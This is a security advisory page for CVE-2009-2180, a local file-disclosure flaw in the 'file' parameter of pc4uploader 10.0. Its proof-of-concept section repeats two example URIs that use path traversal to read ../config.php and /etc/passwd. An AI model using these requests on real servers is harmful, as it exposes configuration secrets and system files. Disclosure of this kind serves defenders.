PC4arb pc4uploader 'file' Parameter Local File Disclosure Vulnerability
BID:43853
Info
PC4arb pc4uploader 'file' Parameter Local File Disclosure Vulnerability
| Bugtraq ID: | 43853 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-2180 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 22 2009 12:00AM |
| Updated: | Jun 22 2009 12:00AM |
| Credit: | Qabandi |
| Vulnerable: |
Pc4arb Pc4Uploader 10.0 |
| Not Vulnerable: | |
Discussion
PC4arb pc4uploader 'file' Parameter Local File Disclosure Vulnerability
pc4uploader is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
pc4uploader 10.0 is vulnerable; other versions may also be affected.
pc4uploader is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
pc4uploader 10.0 is vulnerable; other versions may also be affected.
Exploit / POC
PC4arb pc4uploader 'file' Parameter Local File Disclosure Vulnerability
Attackers may exploit this issue through a browser.
The following example URIs are available:
http://www.example.com/pc4uploader/upfiles/index.php?file=../config.php
http://www.example.com/pc4uploader/upfiles/index.php?file=/etc/passwd
Attackers may exploit this issue through a browser.
The following example URIs are available:
http://www.example.com/pc4uploader/upfiles/index.php?file=../config.php
http://www.example.com/pc4uploader/upfiles/index.php?file=/etc/passwd
References
PC4arb pc4uploader 'file' Parameter Local File Disclosure Vulnerability
References:
References:
- pc4uploader 10.0 - Homepage (PC4arb)